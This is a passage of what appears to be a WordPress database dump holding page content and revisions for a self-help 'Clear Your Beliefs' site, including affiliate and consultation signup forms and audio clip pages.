Email Address Below:</label></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div class="infusion-submit" style="text-align: center;"><button type="submit" value="Register!">Register!</button></div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-30 09:52:44', '2014-07-30 14:52:44', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1321, 2, '2014-07-31 01:11:02', '2014-07-31 06:11:02', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\r\n<p style="text-align: center;">– . – . – . – . – . –</p>\r\nThis page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and to support your work as a Practitioner.\r\n<p style="text-align: center;">Here is the recording of the August 4th, 2014 call,\r\n<em><strong>Introducing the Clear Your Beliefs Program to Practitioners:\r\n</strong></em>(Click to play or right-click to download):</p>\r\n<p style="text-align: center;"><span style="color: #008000;"><strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3"><span style="color: #008000;">Clear Your Beliefs Announcement</span></a> Call</strong></span></p>\r\n\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs-Announcement-8-4-14-ed.mp3"][/audio]\r\n\r\n</div>\r\n<p style="text-align: center;">Here is the document referred to on the call,\r\n"<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:"\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></strong></p>\r\n<p style="text-align: center;">Register as an Affiliate here:\r\n<a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a></p>\r\n<p class="p1" style="text-align: center;"></p>', 'Practitioners', '', 'publish', 'closed', 'open', '', 'practitioners', '', '', '2014-08-27 12:31:24', '2014-08-27 17:31:24', '', 0, 'http://clearyourbeliefs.com/?page_id=1321', 0, 'page', '', 0),
(1322, 2, '2014-07-31 01:10:09', '2014-07-31 06:10:09', '', 'CYB AFFILIATE OPTIONS', '', 'inherit', 'closed', 'open', '', 'cyb-affiliate-options', '', '', '2014-07-31 01:10:09', '2014-07-31 06:10:09', '', 1321, 'http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf', 0, 'attachment', 'application/pdf', 0),
(1323, 2, '2014-07-31 01:11:02', '2014-07-31 06:11:02', 'Download the document, "Clear Your Beliefs Affiliate Options:"\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB AFFILIATE OPTIONS</a>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-07-31 01:11:02', '2014-07-31 06:11:02', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1325, 2, '2014-08-26 20:37:23', '2014-08-27 01:37:23', '<h1 style="text-align: center;">Welcome, BeliefCloset Practitioners!</h1>\n<p style="text-align: center;">– . – . – . – . – . –\n\nThis page contains resources to help you become an <em>Affiliate</em> of Clear Your Beliefs, and support your work as a Practitioner. Here is the recording of the August 4th, 2014 call,  <em><strong>Introducing the Clear Your Beliefs Program to Practitioners:\n</strong></em>(Click to play or right-click to download):\n<strong><a title="Clear Your Beliefs Announcement" href="/wp-content/uploads/resources/media/Clear%20Your%20Beliefs%20Announcement 8-4-14-ed.mp3">Clear Your Beliefs Announcement</a></strong></p>\nHere is the document referred to on the call, "<strong><em>Clear Your Beliefs Affiliate Options</em></strong>:" <strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB Affiliate Options</a></strong>\n\nRegister as an Affiliate here:  <a href="http://clearyourbeliefs.com/affiliate-area"><b>http://clearyourbeliefs.com/affiliate-area</b></a>\n<p class="p1"></p>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-autosave-v1', '', '', '2014-08-26 20:37:23', '2014-08-27 01:37:23', '', 1321, 'http://clearyourbeliefs.com/1321-autosave-v1', 0, 'revision', '', 0),
(1326, 2, '2014-08-08 13:43:59', '2014-08-08 18:43:59', 'Welcome, BeliefCloset Practitioners!\r\n\r\nThis is your page, with resources to help you become an Affiliate of CYB, market your services, and support your work as a Practitioner.\r\n\r\nRecording of the August 4th, 2014 call Introducing the Clear Your Beliefs Program to Practitioners:\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nDownload the document, "Clear Your Beliefs Affiliate Options:"\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB AFFILIATE OPTIONS</a>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-08 13:43:59', '2014-08-08 18:43:59', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1327, 2, '2014-08-08 13:44:20', '2014-08-08 18:44:20', '<h1>Welcome, BeliefCloset Practitioners!</h1>\r\nThis is your page, with resources to help you become an Affiliate of CYB, market your services, and support your work as a Practitioner.\r\n\r\nRecording of the August 4th, 2014 call Introducing the Clear Your Beliefs Program to Practitioners:\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nDownload the document, "Clear Your Beliefs Affiliate Options:"\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf">CYB AFFILIATE OPTIONS</a>', 'Practitioners', '', 'inherit', 'closed', 'open', '', '1321-revision-v1', '', '', '2014-08-08 13:44:20', '2014-08-08 18:44:20', '', 1321, 'http://clearyourbeliefs.com/1321-revision-v1', 0, 'revision', '', 0),
(1328, 2, '2014-08-15 17:30:22', '2014-08-15 22:30:22', '<h1 style="color: #000000;">Beliefs Beneath the Surface</h1>\r\n<h5 style="color: #000000;">This audio clip is from the <em>Clear Your Beliefs</em> eBook.</h5>\r\n<p style="color: #000000;">Press the Play button to start the clip. The volume control is on the right side of the Player.</p>\r\n\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_beneathsurface-_new1.mp3"][/audio]\r\n\r\n</div>\r\n<p style="color: #000000;">"If you study anything deeply enough, you will find beliefs beneath the surface..."</p>', 'Beliefs Beneath The Surface', '', 'publish', 'closed', 'open', '', 'beliefs-beneath-the-surface', '', '', '2014-08-30 23:29:08', '2014-08-31 04:29:08', '', 0, 'http://clearyourbeliefs.com/?page_id=1328', 0, 'page', '', 0),
(1329, 2, '2014-08-15 17:30:22', '2014-08-15 22:30:22', '<h1 style="color: #000000;">Beliefs Beneath the Surface</h1>\r\n<p style="color: #000000;"></p>\r\n\r\n<h5 style="color: #000000;">This audio clip is from the <em>Clear Your Beliefs</em> eBook.</h5>\r\n<p style="color: #000000;">The clip will begin immediately. The volume control is on the left of the Player.</p>\r\n<p style="color: #000000;">\r\n"If you study anything deeply enough, you will find beliefs beneath the surface..."</p>\r\n<p style="color: #000000;"></p>\r\n<p style="color: #000000;"></p>', 'Beliefs Beneath The Surface', '', 'inherit', 'closed', 'open', '', '1328-revision-v1', '', '', '2014-08-15 17:30:22', '2014-08-15 22:30:22', '', 1328, 'http://clearyourbeliefs.com/1328-revision-v1', 0, 'revision', '', 0),
(1330, 2, '2014-08-15 17:31:10', '2014-08-15 22:31:10', '<h1 style="color: #000000;"><strong>A Well-Hidden Secret -- Revealed!</strong></h1>\r\n<h5 style="color: #000000; text-align: center;">This audio clip is from the <em>Clear Your Beliefs</em> eBook.</h5>\r\n<h5 style="color: #000000; text-align: center;">Click Play to begin the audio.  The volume control is on the right of the Player.</h5>\r\n<div style="width: 50%; margin: 0px auto; text-align: center;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_secretrevealed1.mp3"][/audio]\r\n\r\n</div>\r\n<p style="color: #000000; text-align: center;"><strong>\r\n"By studying consciousness directly, I learned how we create our own experience of reality – and how to change it..."</strong></p>\r\n&nbsp;', 'Well Hidden Secret', '', 'publish', 'closed', 'open', '', 'well-hidden-secret', '', '', '2014-09-01 00:30:04', '2014-09-01 05:30:04', '', 0, 'http://clearyourbeliefs.com/?page_id=1330', 0, 'page', '', 0),
(1331, 2, '2014-08-15 17:31:10', '2014-08-15 22:31:10', '<h1 style="color: #000000;"><strong>A Well-Hidden Secret -- Revealed!</strong></h1>\r\n<p style="color: #000000;"></p>\r\n\r\n<h5 style="color: #000000;">This audio clip is from page 12 of the e-book, <strong><em>Transform Your Beliefs</em></strong>.</h5>\r\n<p style="color: #000000;"></p>\r\n\r\n<h5 style="color: #000000;">The clip will begin immediately. The volume control is on the left of the Player.</h5>\r\n<p style="color: #000000;">\r\n<br class="spacer10" /></p>\r\n\r\n<h2 style="color: #000000;">"By studying consciousness directly, I learned how we create our own experience of reality – and how to shift it..."</h2>\r\n&nbsp;', 'Well Hidden Secret', '', 'inherit', 'closed', 'open', '', '1330-revision-v1', '', '', '2014-08-15 17:31:10', '2014-08-15 22:31:10', '', 1330, 'http://clearyourbeliefs.com/1330-revision-v1', 0, 'revision', '', 0),
(1332, 2, '2014-08-15 17:31:48', '2014-08-15 22:31:48', '<h1 style="color: #000000;"><strong>Good News About Your Beliefs</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from the <em>Clear<strong> Your Beliefs </strong></em><strong>ebook.\r\n\r\n</strong><strong style="line-height: 1.3333333333;">C</strong><span style="line-height: 1.3333333333;">lick the P</span><span style="line-height: 1.3333333333;">lay</span><span style="line-height: 1.3333333333;"> button to hear the audio.</span></h5>\r\nThe volume control is on the right of the player.\r\n<p style="color: #000000;"><strong>"I’ve got some bad news and some good news about your beliefs..."</strong></p>\r\n\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/BCP_goodnews.mp3"][/audio]\r\n\r\n</div>', 'Good News and Bad', '', 'publish', 'closed', 'open', '', 'good-news-and-bad', '', '', '2015-01-09 02:12:53', '2015-01-09 07:12:53', '', 0, 'http://clearyourbeliefs.com/?page_id=1332', 0, 'page', '', 0),
(1333, 2, '2014-08-15 17:31:48', '2014-08-15 22:31:48', '', 'Good News and Bad', '', 'inherit', 'closed', 'open', '', '1332-revision-v1', '', '', '2014-08-15 17:31:48', '2014-08-15 22:31:48', '', 1332, 'http://clearyourbeliefs.com/1332-revision-v1', 0, 'revision', '', 0),
(1334, 2, '2014-08-15 17:32:17', '2014-08-15 22:32:17', '<h1 style="color: #000000;"><strong>Good News About Your Beliefs</strong></h1>\r\n<p style="color: #000000;"></p>\r\n\r\n<h5 style="color: #000000;">This audio clip is from page 7 of the e-book, Clear<strong><em> Your Beliefs</em></strong>.</h5>\r\n<p style="color: #000000;">The clip will begin immediately. The volume control is on the left of the Player.</p>\r\n<p style="color: #000000;">\r\n"I’ve got some bad news and some good news about your beliefs..."</p>\r\n<p style="color: #000000;"></p>', 'Good News and Bad', '', 'inherit', 'closed', 'open', '', '1332-revision-v1', '', '', '2014-08-15 17:32:17', '2014-08-15 22:32:17', '', 1332, 'http://clearyourbeliefs.com/1332-revision-v1', 0, 'revision', '', 0),
(1335, 2, '2014-08-15 17:33:38', '2014-08-15 22:33:38', '<h1 style="color: #000000;"><strong>Beliefs Create Your Feelings</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from the  Clear<strong><em> Your Beliefs </em></strong>eBook.</h5>\r\n<p style="color: #000000;">Click the Play button to start the clip. The volume control is on the right of the Player.</p>\r\n\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_createfeelings1.mp3"][/audio]\r\n\r\n</div>\r\n<p style="color: #000000;">"There''s a direct connection between your beliefs and your feelings, and you can experience it directly..."</p>', 'Beliefs Create Feelings', '', 'publish', 'closed', 'open', '', 'beliefs-create-feelings', '', '', '2014-08-31 23:52:29', '2014-09-01 04:52:29', '', 0, 'http://clearyourbeliefs.com/?page_id=1335', 0, 'page', '', 0),
(1388, 2, '2014-08-31 23:52:29', '2014-09-01 04:52:29', '<h1 style="color: #000000;"><strong>Beliefs Create Your Feelings</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from the  Clear<strong><em> Your Beliefs </em></strong>eBook.</h5>\r\n<p style="color: #000000;">Click the Play button to start the clip. The volume control is on the right of the Player.</p>\r\n\r\n<div style="width: 50%; margin: 0 auto;">\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_createfeelings1.mp3"][/audio]\r\n\r\n</div>\r\n<p style="color: #000000;">"There''s a direct connection between your beliefs and your feelings, and you can experience it directly..."</p>', 'Beliefs Create Feelings', '', 'inherit', 'closed', 'open', '', '1335-revision-v1', '', '', '2014-08-31 23:52:29', '2014-09-01 04:52:29', '', 1335, 'http://clearyourbeliefs.com/1335-revision-v1', 0, 'revision', '', 0),
(1337, 2, '2014-08-15 17:35:39', '2014-08-15 22:35:39', '<h1 style="color: #000000;"><strong>Beliefs Create Your Feelings</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from the  Clear<strong><em> Your Beliefs </em></strong>eBook.</h5>\r\n<p style="color: #000000;">The clip will begin immediately. The volume control is on the left of the Player.</p>\r\n<p style="color: #000000;">"There''s a direct connection between your beliefs and your feelings, and you can experience it directly..."</p>', 'Beliefs Create Feelings', '', 'inherit', 'closed', 'open', '', '1335-revision-v1', '', '', '2014-08-15 17:35:39', '2014-08-15 22:35:39', '', 1335, 'http://clearyourbeliefs.com/1335-revision-v1', 0, 'revision', '', 0),
(1336, 2, '2014-08-15 17:33:38', '2014-08-15 22:33:38', '<h1 style="color: #000000;"><strong>Beliefs Create Your Feelings</strong></h1>\r\n<p style="color: #000000;"></p>\r\n\r\n<h5 style="color: #000000;">This audio clip is from the  Clear<strong><em> Your Beliefs </em></strong>eBook.</h5>\r\n<p style="color: #000000;">The clip will begin immediately. The volume control is on the left of the Player.</p>\r\n<p style="color: #000000;">"There''s a direct connection between your beliefs and your feelings, and you can experience it directly..."</p>\r\n<p style="color: #000000;"></p>', 'Beliefs Create Feelings', '', 'inherit', 'closed', 'open', '', '1335-revision-v1', '', '', '2014-08-15 17:33:38', '2014-08-15 22:33:38', '', 1335, 'http://clearyourbeliefs.com/1335-revision-v1', 0, 'revision', '', 0),
(1340, 2, '2014-08-16 14:24:59', '2014-08-16 19:24:59', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 70%; margin: 0 auto;">\r\n[video width="640" height="480" flv="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK-Video-Final.flv"][/video]\r\n<!--h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2--></div>\r\n\r\n&nbsp;', 'Intro Video', '', 'publish', 'closed', 'open', '', 'intro-video', '', '', '2015-01-09 02:08:08', '2015-01-09 07:08:08', '', 0, 'http://clearyourbeliefs.com/?page_id=1340', 0, 'page', '', 0),
(1341, 2, '2014-08-16 14:24:59', '2014-08-16 19:24:59', '', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-08-16 14:24:59', '2014-08-16 19:24:59', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1342, 2, '2014-08-17 13:11:23', '2014-08-17 18:11:23', '<h1 style="color: #000000;">Introducing the BeliefCloset Process (Video)</h1>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-08-17 13:11:23', '2014-08-17 18:11:23', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1343, 2, '2014-08-17 13:11:44', '2014-08-17 18:11:44', '<h1 style="color: #000000;">Introducing <em>The BeliefCloset Process</em> (Video)</h1>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-08-17 13:11:44', '2014-08-17 18:11:44', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1344, 2, '2014-08-17 13:12:06', '2014-08-17 18:12:06', '<h1 style="color: #000000; text-align: center;">Introducing <em>The BeliefCloset Process</em> (Video)</h1>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-08-17 13:12:06', '2014-08-17 18:12:06', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1345, 2, '2014-08-31 23:54:54', '2014-09-01 04:54:54', '<h1 style="color: #000000;"><strong>Good News About Your Beliefs</strong></h1>\n<h5 style="color: #000000;">This audio clip is from the <em>Clear<strong> Your Beliefs </strong></em><strong>ebook.  C</strong>lick the PLAY button to hear the audio.</h5>\n&nbsp;\n\n&nbsp;\n<p style="color: #000000;"><strong>"I’ve got some bad news and some good news about your beliefs..."</strong></p>\n\n<div style="width: 50%; margin: 0 auto;">\n\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/BCP_goodnews.mp3"][/audio]\n\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_beneathsurface-_new.mp3"][/audio]\n\n</div>', 'Good News and Bad', '', 'inherit', 'closed', 'open', '', '1332-autosave-v1', '', '', '2014-08-31 23:54:54', '2014-09-01 04:54:54', '', 1332, 'http://clearyourbeliefs.com/1332-autosave-v1', 0, 'revision', '', 0),
(1346, 2, '2014-08-25 12:03:11', '2014-08-25 17:03:11', '"BCP_goodnews" from Belief Closet Process by Lion Goodman. Released: 2010. Genre: Self-help.', 'BCP_goodnews', '', 'inherit', 'closed', 'open', '', 'bcp_goodnews', '', '', '2014-08-25 12:03:11', '2014-08-25 17:03:11', '', 1332, 'http://clearyourbeliefs.com/wp-content/uploads/2014/08/BCP_goodnews.mp3', 0, 'attachment', 'audio/mpeg', 0),
(1347, 2, '2014-08-25 12:03:25', '2014-08-25 17:03:25', '"bcp_secretrevealed" from Belief Closet Process by Lion Goodman. Released: 2010. Genre: Self-help.', 'bcp_secretrevealed', '', 'inherit', 'closed', 'open', '', 'bcp_secretrevealed', '', '', '2014-08-25 12:03:25', '2014-08-25 17:03:25', '', 1332, 'http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_secretrevealed.mp3', 0, 'attachment', 'audio/mpeg', 0),
(1348, 2, '2014-08-25 12:03:34', '2014-08-25 17:03:34', '"bcp_createfeelings" from Belief Closet Process by Lion Goodman. Released: 2010.', 'bcp_createfeelings', '', 'inherit', 'closed', 'open', '', 'bcp_createfeelings', '', '', '2014-08-25 12:03:34', '2014-08-25 17:03:34', '', 1332, 'http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_createfeelings.mp3', 0, 'attachment', 'audio/mpeg', 0),
(1349, 2, '2014-08-25 12:03:41', '2014-08-25 17:03:41', '"bcp_beneathsurface" from Belief Closet Process by Lion Goodman. Released: 2010.', 'bcp_beneathsurface', '', 'inherit', 'closed', 'open', '', 'bcp_beneathsurface', '', '', '2014-08-25 12:03:41', '2014-08-25 17:03:41', '', 1332, 'http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_beneathsurface-_new.mp3', 0, 'attachment', 'audio/mpeg', 0),
(1350, 2, '2014-08-25 12:06:02', '2014-08-25 17:06:02', '<h1 style="color: #000000;"><strong>Good News About Your Beliefs</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from page 7 of the e-book, Clear<strong><em> Your Beliefs</em></strong>.</h5>\r\n<p style="color: #000000;">Click the PLAY button to hear the audio.</p>\r\n<p style="color: #000000;"><strong>"I’ve got some bad news and some good news about your beliefs..."</strong></p>\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/BCP_goodnews.mp3"][/audio]', 'Good News and Bad', '', 'inherit', 'closed', 'open', '', '1332-revision-v1', '', '', '2014-08-25 12:06:02', '2014-08-25 17:06:02', '', 1332, 'http://clearyourbeliefs.com/1332-revision-v1', 0, 'revision', '', 0),
(1351, 2, '2014-08-25 12:09:16', '2014-08-25 17:09:16', '<h1 style="color: #000000;"><strong>Good News About Your Beliefs</strong></h1>\r\n<h5 style="color: #000000;">This audio clip is from page 7 of the e-book, Clear<strong><em> Your Beliefs</em></strong>.</h5>\r\n<p style="color: #000000;">Click the PLAY button to hear the audio.</p>\r\n<p style="color: #000000;"><strong>"I’ve got some bad news and some good news about your beliefs..."</strong></p>\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/BCP_goodnews.mp3"][/audio]\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/08/bcp_beneathsurface-_new.mp3"][/audio]', 'Good News and Bad', '', 'inherit', 'closed', 'open', '', '1332-revision-v1', '', '', '2014-08-25 12:09:16', '2014-08-25 17:09:16', '', 1332, 'http://clearyourbeliefs.com/1332-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1353, 4194, '2014-08-26 18:43:50', '2014-08-26 23:43:50', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\r\n\r\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 650px;">\r\n\r\n<h1 style="text-align: center;">Schedule Your Free 20-minute Consultation</h1>\r\n<div style="width: 47%; float: left;">\r\n\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall 